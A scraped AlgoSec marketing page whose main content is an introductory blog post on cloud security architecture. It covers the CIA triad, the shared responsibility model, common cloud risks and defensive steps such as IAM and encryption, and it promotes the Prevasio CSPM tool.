First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • Slavery and Human Trafficking Statement - AlgoSec

    Slavery and Human Trafficking Statement Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec Values - AlgoSec

    AlgoSec Values Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec | Your Complete Guide to Cloud Security Architecture

    In today’s digital world, is your data 100% secure? As more people and businesses use cloud services to handle their data,... Cloud Security Your Complete Guide to Cloud Security Architecture Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 7/4/23 Published In today’s digital world, is your data 100% secure? As more people and businesses use cloud services to handle their data, vulnerabilities multiply. Around six out of ten companies have moved to the cloud, according to Statista . So keeping data safe is now a crucial concern for most large companies – in 2022, the average data leak cost companies $4.35 million . This is where cloud security architecture comes in. Done well, it protects cloud-based data from hackers, leaks, and other online threats. To give you a thorough understanding of cloud security architecture, we’ll look at; What cloud security architecture is The top risks for your cloud How to build your cloud security How to choose a CPSM (Cloud Security Posture Management) tool Let’s jump in What is cloud security architecture? Let’s start with a definition: “Cloud security architecture is the umbrella term used to describe all hardware, software and infrastructure that protects the cloud environment and its components, such as data, workloads, containers, virtual machines and APIs.” ( source ) Cloud security architecture is a framework to protect data stored or used in the cloud. It includes ways to keep data safe, such as controlling access, encrypting sensitive information, and ensuring the network is secure. The framework has to be comprehensive because the cloud can be vulnerable to different types of attacks. Three key principles behind cloud security Although cloud security sounds complex, it can be broken down into three key ideas. These are known as the ‘CIA triad’, and they are; Confidentiality Integrity Availability ‘The CIA Triad’ Image source Confidentiality Confidentiality is concerned with data protection. If only the correct people can access important information, breaches will be reduced. There are many ways to do this, like encryption, access control, and user authentication. Integrity Integrity means making sure data stays accurate throughout its lifecycle. Organizations can use checksums and digital signatures to ensure that data doesn’t get changed or deleted. These protect against data corruption and make sure that information stays reliable. Availability Availability is about ensuring data and resources are available when people need them. To do this, you need a robust infrastructure and ways to switch to backup systems when required. Availability also means designing systems that can handle ‘dos attacks’ and will interrupt service. However, these three principles are just the start of a strong cloud infrastructure. The next step is for the cloud provider and customer to understand their security responsibilities. A model developed to do this is called the ‘Shared Responsibility Model.’ Understanding the Shared Responsibility Model Big companies like Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform offer public cloud services. These companies have a culture of being security-minded , but security isn’t their responsibility alone. Companies that use these services also share responsibility for handling data. The division of responsibility depends on the service model a customer chooses. This division led Amazon AWS to create a ‘shared responsibility model’ that outlines these. Image Source There are three main kinds of cloud service models and associated duties: 1. Infrastructure as a Service (IaaS), 2. Platform as a Service (PaaS) 3. Software as a Service (SaaS). Each type gives different levels of control and flexibility. 1. Infrastructure as a Service (IaaS) With IaaS, the provider gives users virtual servers, storage, and networking resources. Users control operating systems, but the provider manages the basic infrastructure. Customers must have good security measures, like access controls and data encryption. They also need to handle software updates and security patches. 2. Platform as a Service (PaaS) PaaS lets users create and run apps without worrying about having hardware on-premises. The provider handles infrastructure like servers, storage, and networking. Customers still need to control access and keep data safe. 3. Software as a Service (SaaS) SaaS lets users access apps without having to manage any software themselves. The provider handles everything, like updates, security, and basic infrastructure. Users can access the software through their browser and start using it immediately. But customers still need to manage their data and ensure secure access. Top six cybersecurity risks As more companies move their data and apps to the cloud, there are more chances for security to occur. Although cybersecurity risks change over time , some common cloud security risks are: 1. Human error 99% of all cloud security incidents from now until 2025 are expected to result from human error. Errors can be minor, like using weak passwords or accidentally sharing sensitive information. They can also be bigger, like setting up security incorrectly. To lower the risk of human error, organizations can take several actions. For example, educating employees, using automation, and having good change management procedures. 2. Denial-of-service attacks DoS attacks stop a service from working by sending too many requests. This can make essential apps, data, and resources unavailable in the cloud. DDoS attacks are more advanced than DoS attacks, and can be very destructive. To protect against these attacks, organizations should use cloud-based DDoS protection. They can also install firewalls and intrusion prevention systems to secure cloud resources. 3. Hardware strength The strength of the physical hardware used for cloud services is critical. Companies should look carefully at their cloud service providers (CSPs) hardware offering. Users can also use special devices called hardware security modules (HSMs). These are used to protect encryption codes and ensure data security. 4. Insider attacks Insider attacks could be led by current or former employees, or key service providers. These are incredibly expensive, costing companies $15.38 million on average in 2021 . To stop these attacks, organizations should have strict access control policies. These could include checking access regularly and watching for strange user behavior. They should also only give users access to what they need for their job. 5. Shadow IT Shadow IT is when people use unauthorized apps, devices, or services. Easy-to-use cloud services are an obvious cause of shadow IT. This can lead to data breaches , compliance issues, and security problems. Organizations should have clear rules about using cloud services. All policies should be run through a centralized IT control to handle this. 6. Cloud edge When we process data closer to us, rather than in a data center, we refer to the data as being in the cloud edge. The issue? The cloud edge can be attacked more easily. There are simply more places to attack, and sensitive data might be stored in less secure spots. Companies should ensure security policies cover edge devices and networks. They should encrypt all data, and use the latest application security patches. Six steps to secure your cloud Now we know the biggest security risks, we can look at how to secure our cloud architecture against them. An important aspect of cloud security practices is managing access your cloud resources. Deciding who can access and what they can do can make a crucial difference to security. Identity and Access Management (IAM) security models can help with this. Companies can do this by controlling user access based on roles and responsibilities. Security requirements of IAM include: 1. Authentication Authentication is simply checking user identity when they access your data. At a superficial level, this means asking for a username and password. More advanced methods include multi-factor authentication for apps or user segmentation. Multi-factor authentication requires users to provide two or more types of proof. 2. Authorization Authorization means allowing access to resources based on user roles and permissions. This ensures that users can only use the data and services they need for their job. Limiting access reduces the risk of unauthorized users. Role-based access control (RBAC) is one way to do this in a cloud environment. This is where users are granted access based on their job roles. 3. Auditing Auditing involves monitoring and recording user activities in a cloud environment. This helps find possible security problems and keeps an access log. Organizations can identify unusual patterns or suspicious behavior by regularly reviewing access logs. 4. Encryption at rest and in transit Data at rest is data when it’s not being used, and data in transit is data being sent between devices or users. Encryption is a way to protect data from unauthorized access. This is done by converting it into a code that can only be read by someone with the right key to unlock it. When data is stored in the cloud, it’s important to encrypt it to protect it from prying eyes. Many cloud service providers have built-in encryption features for data at rest. For data in transit, encryption methods like SSL/TLS help prevent interception. This ensures that sensitive information remains secure as it moves across networks. 5. Network security and firewalls Good network security controls are essential for keeping a cloud environment safe. One of the key network security measures is using firewalls to control traffic. Firewalls are gatekeepers, blocking certain types of connections based on rules. Intrusion detection and prevention systems (IDPS) are another important network security tool. IDPS tools watch network traffic for signs of bad activity, like hacking or malware. They then can automatically block or alert administrators about potential threats. This helps organizations respond quickly to security incidents and minimize damage. 6. Versioning and logging Versioning is tracking different versions of cloud resources, like apps and data. This allows companies to roll back to a previous version in case of a security incident or data breach. By maintaining a version history, organizations can identify and address security vulnerabilities. How a CSPM can help protect your cloud security A Cloud Security Posture Management (CSPM) tool helpful to safeguard cloud security. These security tools monitor your cloud environment to find and fix potential problems. Selecting the right one is essential for maintaining the security of your cloud. A CSPM tool like Prevasio management service can help you and your cloud environment. It can provide alerts, notifying you of any concerns with security policies. This allows you to address problems quickly and efficiently. Here are some of the features that Prevasio offers: Agentless CSPM solution Secure multi-cloud environments within 3 minutes Coverage across multi-cloud, multi-accounts, cloud-native services, and cloud applications Prioritized risk list based on CIS benchmarks Uncover hidden backdoors in container environments Identify misconfigurations and security threats Dynamic behavior analysis for container security issues Static analysis for container vulnerabilities and malware All these allow you to fix information security issues quickly to avoid data loss. Investing in a reliable CSPM tool is a wise decision for any company that relies on cloud technology. Final Words As the cloud computing security landscape evolves, so must cloud security architects. All companies need to be proactive in addressing their data vulnerabilities. Advanced security tools such as Prevasio make protecting cloud environments easier. Having firm security policies avoids unnecessary financial and reputational risk. This combination of strict rules and effective tools is the best way to stay secure. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

bottom of page